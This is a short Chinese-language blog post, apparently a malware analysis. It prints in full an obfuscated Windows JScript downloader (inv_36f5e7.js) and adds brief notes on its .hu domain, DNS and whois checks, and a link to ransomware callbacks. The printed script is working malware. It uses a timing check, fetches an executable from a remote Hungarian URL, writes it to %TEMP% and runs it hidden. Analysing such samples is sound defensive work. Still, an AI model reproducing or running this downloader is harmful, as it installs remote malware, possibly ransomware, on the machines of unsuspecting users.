File: inv_36f5e7.js Size: 5942 bytes Modified: 2016年8月17日, 18:54:00 MD5: C533B463D5598971BB32C1F743DDCC00 SHA1: C428931655EDE93A162B347525F5095FA78A454C CRC32: 8CCB751D
[javascript] view plain copy print ? var oVFDA = "sdf"; var EqgwssuzDk = "i"; var CbMBFrpAenNixzr = "h"; var yZkyvpryerzo = "yau"; var OWfFyitBNfkGS = "sdf"; var EvKJKTni = "g"; var YED = "o"; var vrbkQrmZz = "a7"; var bSsgh = "d8f"; var VYq = "s"; var GqlRwYwyNRjmTXO = "7hg"; var HFaPeXFfQf = "u"; var pGJyKMNeMeSz = "dfa"; var pAHggazU = "aos"; var xeDmnRN = "kj"; var TkioFGwdqECzf = "lf"; var IvPA = "sd;"; var HGddEOIyEGlKqD = "a"; var RbAPg = "sdf"; var DweZT = "i"; var nooWw = "h"; var UOxiWTJeveTmc = "au"; var GGq = "fy"; var CZrdIAVaegI = "gsd"; var xBbxlkaid = "7o"; var xJk = "fa"; var lrrwKaQ = "8"; var tofjOwTTPqM = "gsd"; var jEkcPFPSClJy = "7h"; var dDdBSo = "au"; var MEKSkHWtXrXoq = "df"; var kRtwsMEVOvikhF = "aos"; var konDHgULOMLl = "kj"; var HwhuZGGGz = ";lf"; var QBGEkEyKTteSIFE = "sd"; var dxgAcnIaWaT = "a"; var npimEHxyw = "f"; var gzxAaIuOe = "d"; var glyIl = "is"; var vbXMnALqxJBTr = "uh"; var gfFVKDRDHlxh = "a"; var YRIeFmpyL = "y"; var Hsxi = "sdf"; var NBNVa = "7og"; var DGqwnJBYAr = "a"; var hXk = "d8f"; var YRNkBZkjVUGix = "hgs"; var nJeBUHrKmk = "7"; var BRYybtRzxHbq = "u"; var YnDofAgHjZLXTwL = "fa"; var kaJShal = "d"; var fxOc = "os"; var lKqmYlqyawDnPk = "kja"; var uNcGe = "lf"; var FLQDqhBNnjk = "d;"; var TvLqeh = "as"; var qFo = "e"; var OZGbRIQVppIwJ = "os"; var fDUqIyLO = "cl"; var KIPIrWHXsdgcjhF = "e"; var ofBSJENQVY = "Fil"; var jhmP = "o"; var shE = "eT"; var pCDcoO = "v"; var grHAZU = "Sa"; var ZwBDHN = "n"; var fzL = "o"; var sxFrtUgpGCEifOx = "i"; var HROa = "t"; var Hfuv = "i"; var HhIOUuVwmtFlbtA = "os"; var JSyyTjZmGqBZwN = "p"; var YPpqq = "te"; var uQtDLJnmFzR = "wri"; var zCnbEiZVwMiA = "pe"; var mvqWxpA = "ty"; var zzXzkEpTxO = "en"; var pFLxXyd = "p"; var MTfggvfPTyT = "o"; var KfyjmYkEKyLx = "m"; var aHQYUcaVlUQ = "rea"; var VoFg = "t"; var xTCoqvmVK = "S"; var CNfbwIDnKCJ = "."; var uYU = "DB"; var fFDMGjDtbjfDF = "O"; var RMplJWcHEVBva = "AD"; var RNCQbKNaOibbTl = "ct"; var EMFHhMe = "je"; var GaeRpeLYCwKeEC = "eOb"; var ACHlTpc = "t"; var biNKioucc = "ea"; var aYSkIHN = "Cr"; var ICjmvAisL = "h4"; var aEr0 = "n4"; var MNnRRgRcnPquuz = "j6"; var YrkHeRxNcrvLD = "0k6"; var GkO = "hu/"; var cpEzVKLF = "l."; var ZaQRCrwuBRfemMj = "ta"; var nXmUKyNe = "por"; var UcAIGgT = "gy"; var JRGbuChEIxq = "vje"; var UoUZIHURnralKh = "ne"; var ZkWZmYmexUdi = "w."; var rpdWQwC = "ww"; var AOuPR = "/"; var nLpcsaMNDX = ":/"; var ZTxmNnUJLtPPC = "ttp"; var OxIajXRPSVa = "h"; var yVwM = "GET"; var yFZAdJ = "n"; var STz = "ope"; var onrpWtwXwgwLZP = "e"; var xYlXNtDRSZu = "ex"; var qPstEQFAMJHLr = "t."; var tNixekYOZqcy = "I"; var YPOKzIhmiBkdG = "qs"; var UcOH = "2Xp"; var CMmsXjM = "m"; var QrywMxwtxaCEC = "%/"; var gIEqprqVOtlKtL = "P"; var SotUSdXog = "EM"; var WvqJvwrjlrY = "%T"; var JTbat = "s"; var PtOsPvJH = "g"; var ViiBnvJlfWUdhl = "in"; var iliEPeW = "tr"; var CmkLzTNEUf = "ntS"; var lkbyPygIhjm = "me"; var BGZCgLI = "ron"; var OQvyGswz = "nvi"; var jATLqdGXmuKKYMM = "E"; var OnCqpejicsbs = "and"; var OgwgCQuslbYE = "p"; var lWDmjSKUCrG = "Ex"; var eSfpjes = "P"; var qiIBBwTIjOPjGi = "HTT"; var jtaGAmHFz = "XML"; var VNpjktQlhr = "2."; var vExUuOaRJUo = "ML"; var hkQYQQyQIIP = "SX"; var TkqreSKtbpOfyb = "M"; var RQwrKfLavgwJtWC = "un"; var RtQNL = "R"; var CFnecv = "l"; var hxgNojMPu = "l"; var uzMNS = "he"; var fOV = "t.S"; var xXXE = "ip"; var TdlRpCiUZgx = "cr"; var fsCFTGEb = "WS"; var yiiZpVegzCCZf = "t"; var KTtBpdR = "c"; var kePFmBQQenw = "je"; var hFarMMFi = "Ob"; var JqtZh = "e"; var WbHjmwvNlDAiIto = "t"; var vmj = "rea"; var MWhy = "C"; var lewy = new Date(); var JpCLwbk = lewy.getMilliseconds(); WScript.Sleep(10); var lewy = new Date(); var amtDmXHniaHq = lewy.getMilliseconds(); WScript.Sleep(10); var lewy = new Date(); var Uwj = lewy.getMilliseconds(); WScript.Sleep(10); var lewy = new Date(); var YhfbOZ = lewy.getMilliseconds(); var kgea = amtDmXHniaHq - JpCLwbk; var EqLhv = Uwj - amtDmXHniaHq; var qxHRARFzWjTBRjC = YhfbOZ - Uwj; WshShell = WScript[MWhy + vmj + WbHjmwvNlDAiIto + JqtZh + hFarMMFi + kePFmBQQenw + KTtBpdR + yiiZpVegzCCZf](fsCFTGEb + TdlRpCiUZgx + xXXE + fOV + uzMNS + hxgNojMPu + CFnecv); function urLi(IecREUsCLsZ){WshShell[RtQNL + RQwrKfLavgwJtWC](IecREUsCLsZ, 0, 0);} function gxUedR(n){return TkqreSKtbpOfyb + hkQYQQyQIIP + vExUuOaRJUo + VNpjktQlhr + jtaGAmHFz + qiIBBwTIjOPjGi + eSfpjes;} if ((kgea != EqLhv) || (EqLhv != qxHRARFzWjTBRjC)){sSJOsjbTF = WshShell[lWDmjSKUCrG + OgwgCQuslbYE + OnCqpejicsbs + jATLqdGXmuKKYMM + OQvyGswz + BGZCgLI + lkbyPygIhjm + CmkLzTNEUf + iliEPeW + ViiBnvJlfWUdhl + PtOsPvJH + JTbat](WvqJvwrjlrY + SotUSdXog + gIEqprqVOtlKtL + QrywMxwtxaCEC) + CMmsXjM + UcOH + YPOKzIhmiBkdG + tNixekYOZqcy + qPstEQFAMJHLr + xYlXNtDRSZu + onrpWtwXwgwLZP; VcmpOhXAkWS = gxUedR(0); fgRtFR = WScript.CreateObject(VcmpOhXAkWS); fgRtFR[STz + yFZAdJ](yVwM, OxIajXRPSVa + ZTxmNnUJLtPPC + nLpcsaMNDX + AOuPR + rpdWQwC + ZkWZmYmexUdi + UoUZIHURnralKh + JRGbuChEIxq + UcAIGgT + nXmUKyNe + ZaQRCrwuBRfemMj + cpEzVKLF + GkO + YrkHeRxNcrvLD + MNnRRgRcnPquuz + aEr0 + ICjmvAisL, false); fgRtFR.send(); while (fgRtFR.readystate < 4 ) {WScript.Sleep(1000)}; wrZOz = WScript[MWhy + vmj + WbHjmwvNlDAiIto + JqtZh + hFarMMFi + kePFmBQQenw + KTtBpdR + yiiZpVegzCCZf](RMplJWcHEVBva + fFDMGjDtbjfDF + uYU + CNfbwIDnKCJ + xTCoqvmVK + VoFg + aHQYUcaVlUQ + KfyjmYkEKyLx); wrZOz[STz + yFZAdJ](); wrZOz[mvqWxpA + zCnbEiZVwMiA] = 1; wrZOz[uQtDLJnmFzR + YPpqq](fgRtFR.ResponseBody); wrZOz[JSyyTjZmGqBZwN + HhIOUuVwmtFlbtA + Hfuv + HROa + sxFrtUgpGCEifOx + fzL + ZwBDHN] = 0; wrZOz[grHAZU + pCDcoO + shE + jhmP + ofBSJENQVY + KIPIrWHXsdgcjhF](sSJOsjbTF, 2 ); wrZOz[fDUqIyLO + OZGbRIQVppIwJ + qFo](); urLi(sSJOsjbTF); kgea = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + amtDmXHniaHq + JpCLwbk; EqLhv = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + Uwj + amtDmXHniaHq; qxHRARFzWjTBRjC = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + YhfbOZ + Uwj; }
其实编码并不复杂,只是进行了大量的代码数据和字符串替换。
主要功能如下
标准的恶意程序下载者,不懂下载者的可以百度。
关键位置标记,hu.域名。来自匈牙利的国家一级域名。看来是个国外黑客。
dns查询
whois查询
搜索有没有其它已披露恶意CC服务器,发现其还有勒索病毒回连。
http://www.jb51.net/shouce/xmlhttp/ http://www.jb51.net/article/50712.htm
